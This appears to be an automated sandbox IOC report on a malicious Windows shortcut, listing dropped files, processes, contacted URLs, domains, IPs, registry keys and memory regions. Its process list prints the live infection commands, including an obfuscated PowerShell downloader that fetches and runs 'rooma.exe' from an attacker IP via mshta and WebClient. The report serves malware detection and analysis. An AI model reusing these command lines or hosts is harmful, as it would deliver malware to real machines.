IOC Report
Offer Document 24.lnk

loading gif

Files

File Path
Type
Category
Malicious
Offer Document 24.lnk
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\room4[1].hta
HTML document, ASCII text, with very long lines (9201), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\rooma.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x180ee149, page size 16384, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\F56GKLK7U4
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dt5txxwm.wks.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpkvo4uk.0pp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ov0wzwnj.053.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtse0ftd.ltg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1CY632ESM58YCEYJOCNT.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ee487d0d1c422de2.customDestinations-ms (copy)
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta'
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
malicious
C:\Users\user\AppData\Roaming\rooma.exe
"C:\Users\user\AppData\Roaming\rooma.exe"
malicious
C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
"C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe"
malicious
C:\Windows\SysWOW64\netbtugc.exe
"C:\Windows\SysWOW64\netbtugc.exe"
malicious
C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
"C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://20.86.128.22
unknown
malicious
http://20.86.12
unknown
malicious
http://20.86.128.223/
unknown
malicious
http://20.86.128.
unknown
malicious
http://20.86.128.223
unknown
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://20.8
unknown
malicious
http://20.86.
unknown
malicious
http://20.86.128.223/room/rooma.exe
20.86.128.223
malicious
http://20.86.128.223/room
unknown
malicious
http://20.86
unknown
malicious
http://20.86.1
unknown
malicious
http://20.86.128.223/ro
unknown
malicious
http://20.86.128.223/room/roo
unknown
malicious
http://20.86.128.223/room/ro
unknown
malicious
http://20.86.128.2
unknown
malicious
http://20.86.128.223/room/
unknown
malicious
http://20.86.128.223/room/room
unknown
malicious
http://20.86.128.223/room/room4.hta
20.86.128.223
malicious
http://20.86.128.223/r
unknown
malicious
http://20.86.128.223/room/r
unknown
malicious
http://20.86.128
unknown
malicious
http://20.86.128.223/roo
unknown
malicious
https://duckduckgo.com/chrome_newtab
unknown
http://20.86.1H2
unknown
https://duckduckgo.com/ac/?q=
unknown
https://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR
unknown
https://go.microsoft.co9
unknown
http://www.donnavariedades.com/fo8o/?Plm0mn68=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFBqtQGck9fp1rRtCXud2beKokCA0CIPwH0kByjXVEoJ79g==&kzN4Y=k0xDPL
23.227.38.74
http://20.86.128.223/room/room4.htaFPS_BROWSER_AP
unknown
https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi
unknown
http://20.86.128.223/room/room4.hta8N
unknown
http://www.3xfootball.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==
154.215.72.110
http://www.kasegitai.tokyo/fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPL
202.172.28.202
https://nuget.org/nuget.exe
unknown
http://www.magmadokum.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA==
85.159.66.93
http://20.86.128.223/room/room4.hta...H2
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://20.86.128.223/room/rooma.e
unknown
http://20.86.128.223/room/room4.htaLMEMH
unknown
https://musee.mobi/vivaldi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://www.joyesi.xyz/fo8o/
185.237.107.49
http://www.antonio-vivaldi.mobi/fo8o/
46.30.213.191
http://20.86.128.223/room/room4.htaY
unknown
https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLta
unknown
https://contoso.com/Icon
unknown
http://www.elettrosistemista.zip/fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ==
195.110.124.133
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ==
116.50.37.244
http://crl.ver)
unknown
https://g.live.com/odclientsettings/ProdV2/C:
unknown
https://www.ecosia.org/newtab/
unknown
http://20.86.128.223/room/room4.htao
unknown
https://github.com/Pester/Pester
unknown
https://codepen.io/uzcho_/pens/popular/?grid_type=list
unknown
http://20.86.128.223/room/room4.htat
unknown
https://codepen.io/uzcho_/pen/eYdmdXw.css
unknown
http://www.rssnewscast.com/fo8o/?Plm0mn68=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&kzN4Y=k0xDPL
91.195.240.94
http://20.86.128.223/room/rooma.exep
unknown
http://www.empowermedeco.com/fo8o/
217.196.55.202
http://20.86.128.223/room/rooma.
unknown
https://contoso.com/License
unknown
http://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPL
217.196.55.202
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://20.86.128.223/room/room4.hta$
unknown
http://www.660danm.top/fo8o/
34.111.148.214
http://www.magmadokum.com/fo8o/
85.159.66.93
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
unknown
http://www.rssnewscast.com/fo8o/
91.195.240.94
http://www.660danm.top/fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q==
34.111.148.214
http://www.kasegitai.tokyo/fo8o/
202.172.28.202
http://20.86.128.223/room/room4.htaventindowsINetCookiesIO
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
http://20.86.128.223/room/room4.htaH
unknown
http://www.joyesi.xyz
unknown
http://20.86.128.223/room/room4.hta....=H
unknown
http://www.goldenjade-travel.com/fo8o/
116.50.37.244
http://nuget.org/NuGet.exe
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prI
unknown
http://20.86.128.223/room/rooma
unknown
http://www.elettrosistemista.zip/fo8o/
195.110.124.133
http://www.antonio-vivaldi.mobi/fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdmVZ54UmbyKF16zvv1yGe3hSwRWBn0bZic9A2kho+UJ9gA==&kzN4Y=k0xDPL
46.30.213.191
http://www.donnavariedades.com/fo8o/
23.227.38.74
https://www.sedo.com/services/parking.php3
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://g.live.com/odclientsettings/Prod/C:
unknown
http://www.joyesi.xyz/fo8o/?kzN4Y=k0xDPL&Plm0mn68=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0vz/DDu79arRp32UcJsNkv7g6dr0ICiHZvS3tESvUt5oYRbw==
185.237.107.49
https://donnavariedades.com/fo8o?Plm0mn68=l
unknown
http://20.86.128.223/room/room4.htaC:
unknown
http://20.86.128.223/room/rooma.ex
unknown
http://20.86.128.223/room/room4.htastricted
unknown
http://20.86.128.223/room/room4.hta4.C:
unknown
https://aka.ms/pscore68
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
http://www.techchains.info/fo8o/
66.29.149.46
http://20.86.128.223/room/room4.hta;H
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.joyesi.xyz
185.237.107.49
malicious
www.magmadokum.com
unknown
malicious
www.donnavariedades.com
unknown
malicious
www.liangyuen528.com
unknown
malicious
www.empowermedeco.com
unknown
malicious
www.k9vyp11no3.cfd
unknown
malicious
www.elettrosistemista.zip
unknown
malicious
www.660danm.top
34.111.148.214
empowermedeco.com
217.196.55.202
shops.myshopify.com
23.227.38.74
natroredirect.natrocdn.com
85.159.66.93
www.kasegitai.tokyo
202.172.28.202
elettrosistemista.zip
195.110.124.133
www.3xfootball.com
154.215.72.110
www.shenzhoucui.com
104.206.198.212
www.antonio-vivaldi.mobi
46.30.213.191
www.goldenjade-travel.com
116.50.37.244
www.rssnewscast.com
91.195.240.94
www.techchains.info
66.29.149.46
There are 9 hidden domains, click here to show them.

IPs

IP
Domain
Country
Malicious
185.237.107.49
www.joyesi.xyz
Ukraine
malicious
20.86.128.223
unknown
United States
malicious
91.195.240.94
www.rssnewscast.com
Germany
34.111.148.214
www.660danm.top
United States
116.50.37.244
www.goldenjade-travel.com
Taiwan; Republic of China (ROC)
23.227.38.74
shops.myshopify.com
Canada
85.159.66.93
natroredirect.natrocdn.com
Turkey
202.172.28.202
www.kasegitai.tokyo
Japan
66.29.149.46
www.techchains.info
United States
154.215.72.110
www.3xfootball.com
Seychelles
195.110.124.133
elettrosistemista.zip
Italy
127.0.0.1
unknown
unknown
46.30.213.191
www.antonio-vivaldi.mobi
Denmark
217.196.55.202
empowermedeco.com
Norway
There are 4 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2550000
system
page execute and read and write
malicious
2C10000
trusted library allocation
page read and write
malicious
9B1000
unkown
page execute and read and write
malicious
14C0000
unclassified section
page execute and read and write
malicious
3800000
unclassified section
page execute and read and write
malicious
2C50000
trusted library allocation
page read and write
malicious
23A0000
system
page execute and read and write
malicious
47F0000
unkown
page execute and read and write
malicious
24A03190000
trusted library allocation
page read and write
23FE3C3F000
heap
page read and write
787D000
heap
page read and write
24A03B02000
heap
page read and write
2E2F000
heap
page read and write
7FFE000
stack
page read and write
2B11000
heap
page read and write
23FE3DE7000
heap
page read and write
21E64339000
trusted library allocation
page read and write
23FE4585000
heap
page read and write
237E138C000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
23FE449A000
heap
page read and write
2B11000
heap
page read and write
237E1384000
heap
page read and write
23FE3DC0000
heap
page read and write
21E62420000
heap
page readonly
93E000
unkown
page readonly
700000
unkown
page readonly
21E7C620000
heap
page execute and read and write
78B8000
heap
page read and write
101D000
heap
page read and write
23FE3C39000
heap
page read and write
2B11000
heap
page read and write
237E2BD0000
heap
page read and write
23FE449F000
heap
page read and write
7FFB4A1AC000
trusted library allocation
page execute and read and write
23FE44D1000
heap
page read and write
FB87EFB000
stack
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
24A08904000
heap
page read and write
23FE4479000
heap
page read and write
23FE438E000
heap
page read and write
23FE44A8000
heap
page read and write
9CE000
stack
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
11E4000
heap
page read and write
23FE3E6E000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
21E623F0000
trusted library allocation
page read and write
23FE456A000
heap
page read and write
24A03300000
heap
page read and write
23FE451E000
heap
page read and write
237E1230000
trusted library allocation
page read and write
24A08CB0000
trusted library allocation
page read and write
28F0000
heap
page read and write
120000
unkown
page readonly
23FE3DE7000
heap
page read and write
7FFB4A16B000
trusted library allocation
page read and write
13C0000
unkown
page readonly
A2BA6FE000
stack
page read and write
237E1387000
heap
page read and write
85F000
stack
page read and write
FB876FE000
stack
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
23FE438E000
heap
page read and write
25D0000
heap
page read and write
3966000
unkown
page read and write
2417F401000
trusted library allocation
page read and write
21E64568000
trusted library allocation
page read and write
5DD0000
trusted library allocation
page read and write
2417EBEB000
heap
page read and write
93E000
unkown
page readonly
24A03A00000
heap
page read and write
23FE3DCE000
heap
page read and write
283E000
stack
page read and write
2880000
heap
page read and write
288E000
heap
page read and write
63F000
heap
page read and write
23FE3C89000
heap
page read and write
23FE456C000
heap
page read and write
2B11000
heap
page read and write
21FF000
stack
page read and write
2B11000
heap
page read and write
CF1000
unkown
page readonly
24A088FE000
heap
page read and write
2B11000
heap
page read and write
24A08754000
trusted library allocation
page read and write
23FE4568000
heap
page read and write
2931000
heap
page read and write
2B11000
heap
page read and write
13AE000
heap
page read and write
16FE000
direct allocation
page execute and read and write
24A03317000
heap
page read and write
2B11000
heap
page read and write
24A08740000
trusted library allocation
page read and write
23FE3C77000
heap
page read and write
23FE2F37000
heap
page read and write
FB892FE000
unkown
page readonly
23FE3C39000
heap
page read and write
24A08842000
heap
page read and write
24DB000
stack
page read and write
2417EB01000
system
page execute and read and write
21E62270000
heap
page read and write
2B11000
heap
page read and write
2461000
system
page execute and read and write
2B11000
heap
page read and write
23FE457D000
heap
page read and write
23FE3C7F000
heap
page read and write
24A08902000
heap
page read and write
23FE44D5000
heap
page read and write
2B11000
heap
page read and write
24A0882C000
heap
page read and write
2B11000
heap
page read and write
78FF000
heap
page read and write
2B11000
heap
page read and write
7844000
heap
page read and write
7DF46A8A0000
trusted library allocation
page execute and read and write
23FE4326000
heap
page read and write
24A03213000
heap
page read and write
23FE4345000
heap
page read and write
23FE3DBE000
heap
page read and write
93E000
unkown
page readonly
2B11000
heap
page read and write
23FE43A9000
heap
page read and write
23FE4566000
heap
page read and write
23FE456C000
heap
page read and write
1E0000
unkown
page readonly
7FFB4A350000
trusted library allocation
page read and write
23FE4575000
heap
page read and write
21E62476000
heap
page read and write
23FE4566000
heap
page read and write
23FE4413000
heap
page read and write
23FE4568000
heap
page read and write
23FE4409000
heap
page read and write
7FFB4A410000
trusted library allocation
page read and write
23FE4512000
heap
page read and write
23FE3C16000
heap
page read and write
2B11000
heap
page read and write
1024000
heap
page read and write
23FE3C14000
heap
page read and write
2417F300000
trusted library allocation
page read and write
24A03B1A000
heap
page read and write
23FE8894000
heap
page read and write
2B11000
heap
page read and write
21E63FC8000
heap
page read and write
920000
unkown
page read and write
23FE456C000
heap
page read and write
23FE449F000
heap
page read and write
2E33000
heap
page read and write
23FE3C80000
heap
page read and write
304E000
direct allocation
page execute and read and write
23FE44AF000
heap
page read and write
2B11000
heap
page read and write
7FFB4A450000
trusted library allocation
page read and write
1560000
direct allocation
page execute and read and write
2B11000
heap
page read and write
24A08892000
heap
page read and write
23FE44AF000
heap
page read and write
2B11000
heap
page read and write
7FFB4A3C0000
trusted library allocation
page read and write
23FE3E6C000
heap
page read and write
7FFB4A152000
trusted library allocation
page read and write
2FD9000
direct allocation
page execute and read and write
BCFE0BE000
stack
page read and write
237E1315000
heap
page read and write
7FFB4A3F0000
trusted library allocation
page read and write
23FE4568000
heap
page read and write
BCFEC0E000
stack
page read and write
23FE4568000
heap
page read and write
2CD6000
unkown
page read and write
2B11000
heap
page read and write
23FE3C40000
heap
page read and write
23FE3E67000
heap
page read and write
23FE3C40000
heap
page read and write
23FE3C86000
heap
page read and write
2B11000
heap
page read and write
8D0000
heap
page read and write
23FE457D000
heap
page read and write
223C000
unkown
page read and write
2B11000
heap
page read and write
23FE457D000
heap
page read and write
7FFB4A360000
trusted library allocation
page read and write
23FE4563000
heap
page read and write
1AA000
stack
page read and write
BCFE03E000
stack
page read and write
23FE3C89000
heap
page read and write
970000
unkown
page read and write
24A03302000
heap
page read and write
7FFB4A20C000
trusted library allocation
page execute and read and write
23FE456E000
heap
page read and write
23FE44B4000
heap
page read and write
2B11000
heap
page read and write
24A08D80000
trusted library allocation
page read and write
8B0000
unkown
page readonly
608E000
stack
page read and write
86C000
stack
page read and write
21E625A0000
trusted library allocation
page read and write
237E135D000
heap
page read and write
2B11000
heap
page read and write
23FE43F3000
heap
page read and write
2B11000
heap
page read and write
783F000
heap
page read and write
2B11000
heap
page read and write
23FE457D000
heap
page read and write
23FE4401000
heap
page read and write
34DC000
unclassified section
page read and write
24A03130000
heap
page read and write
24A086F0000
trusted library allocation
page read and write
4878000
unclassified section
page read and write
24A03292000
heap
page read and write
D60000
heap
page read and write
960000
unkown
page readonly
21E62624000
heap
page read and write
23FE449F000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
23FE86E0000
heap
page read and write
2D06000
heap
page read and write
24A0323F000
heap
page read and write
23FE455A000
heap
page read and write
2B11000
heap
page read and write
21E63DD1000
heap
page read and write
7FFB4A420000
trusted library allocation
page read and write
237E137D000
heap
page read and write
1013000
heap
page read and write
2417EC01000
heap
page read and write
23FE430F000
heap
page read and write
961000
unkown
page readonly
2B11000
heap
page read and write
24A08A00000
trusted library allocation
page read and write
23FE4575000
heap
page read and write
23FE3C2E000
heap
page read and write
23FE000
system
page execute and read and write
23FE44C3000
heap
page read and write
23FE4585000
heap
page read and write
2B11000
heap
page read and write
2518000
stack
page read and write
24A03300000
heap
page read and write
23FE455D000
heap
page read and write
23FE4308000
heap
page read and write
7882000
heap
page read and write
237E135D000
heap
page read and write
A2BB1FB000
stack
page read and write
2B11000
heap
page read and write
24A03313000
heap
page read and write
24A03150000
heap
page read and write
A2BA4F6000
stack
page read and write
2417F321000
trusted library allocation
page read and write
23FE4449000
heap
page read and write
1AA000
stack
page read and write
2417F4AA000
trusted library allocation
page read and write
23FE3C1F000
heap
page read and write
2B11000
heap
page read and write
23FE456C000
heap
page read and write
21E7C6DE000
heap
page read and write
317D000
direct allocation
page execute and read and write
7FFB4A470000
trusted library allocation
page read and write
2B11000
heap
page read and write
23FE4529000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
237E135A000
heap
page read and write
23FE3DDE000
heap
page read and write
23FE456C000
heap
page read and write
23FE86C5000
trusted library allocation
page read and write
240A000
system
page execute and read and write
23FE4585000
heap
page read and write
1019000
heap
page read and write
237E1240000
trusted library allocation
page read and write
86C000
stack
page read and write
7FFB4A153000
trusted library allocation
page execute and read and write
3642000
unkown
page read and write
2B44000
unkown
page read and write
23FE3C91000
heap
page read and write
23FE4518000
heap
page read and write
23FE4342000
heap
page read and write
24A0327E000
heap
page read and write
100A000
heap
page read and write
2B11000
heap
page read and write
21E62350000
heap
page read and write
24A03B13000
heap
page read and write
2B11000
heap
page read and write
600000
unkown
page read and write
23FE4404000
heap
page read and write
23FE3DC8000
heap
page read and write
22B0000
unkown
page readonly
21E7C6A6000
heap
page read and write
2417EC01000
heap
page read and write
21E645A4000
trusted library allocation
page read and write
237E1384000
heap
page read and write
23FE4585000
heap
page read and write
24A08900000
heap
page read and write
11E4000
heap
page read and write
8C0000
unkown
page readonly
2924000
heap
page read and write
237E1264000
heap
page read and write
24A08710000
trusted library allocation
page read and write
2C90000
trusted library allocation
page read and write
2417F4C4000
trusted library allocation
page read and write
23FE44E1000
heap
page read and write
23FE456E000
heap
page read and write
237E1399000
heap
page read and write
2937000
heap
page read and write
21E64598000
trusted library allocation
page read and write
4C8C000
unkown
page read and write
2B11000
heap
page read and write
23FE4312000
heap
page read and write
D60000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
19AF000
stack
page read and write
23FE43EA000
heap
page read and write
23FE2F3E000
heap
page read and write
23FE44D0000
heap
page read and write
23FE455D000
heap
page read and write
23FE4585000
heap
page read and write
4554000
unclassified section
page read and write
11E4000
heap
page read and write
7FFB4A370000
trusted library allocation
page read and write
21E65474000
trusted library allocation
page read and write
930000
unkown
page readonly
23FE3D70000
heap
page read and write
21E645A6000
trusted library allocation
page read and write
960000
unkown
page readonly
24A08CF0000
trusted library allocation
page read and write
23E5000
system
page execute and read and write
23FE4326000
heap
page read and write
237E1350000
heap
page read and write
2B11000
heap
page read and write
21E7C450000
heap
page read and write
2B11000
heap
page read and write
7849000
heap
page read and write
23FE3E6E000
heap
page read and write
23FE457D000
heap
page read and write
2B11000
heap
page read and write
BCFDB7E000
stack
page read and write
CF1000
unkown
page readonly
21E65BDA000
trusted library allocation
page read and write
69EF3FB000
stack
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
2B11000
heap
page read and write
21E7C627000
heap
page execute and read and write
23FE4563000
heap
page read and write
BCFDCFE000
stack
page read and write
295D000
heap
page read and write
23FE3E6E000
heap
page read and write
237E11B0000
heap
page read and write
24A087E0000
trusted library allocation
page read and write
2B11000
heap
page read and write
23FE3C26000
heap
page read and write
23FE449F000
heap
page read and write
23FE455D000
heap
page read and write
78AE000
heap
page read and write
64C000
heap
page read and write
23FE3C32000
heap
page read and write
237E2BD4000
heap
page read and write
23FE3C2A000
heap
page read and write
500000
unkown
page readonly
2B11000
heap
page read and write
9B0000
unkown
page readonly
14C0000
direct allocation
page read and write
23FE2F24000
heap
page read and write
237E1266000
heap
page read and write
237E126E000
heap
page read and write
2B11000
heap
page read and write
23FE44BB000
heap
page read and write
23FE3DD1000
heap
page read and write
24A08870000
trusted library allocation
page read and write
783F000
heap
page read and write
23FE456C000
heap
page read and write
23FE4563000
heap
page read and write
21E64111000
trusted library allocation
page read and write
69EFBFD000
stack
page read and write
21E656CF000
trusted library allocation
page read and write
23FE4404000
heap
page read and write
23FE4585000
heap
page read and write
21E63F30000
heap
page read and write
7FFB4A30A000
trusted library allocation
page read and write
3F0C000
unclassified section
page read and write
23FE3E03000
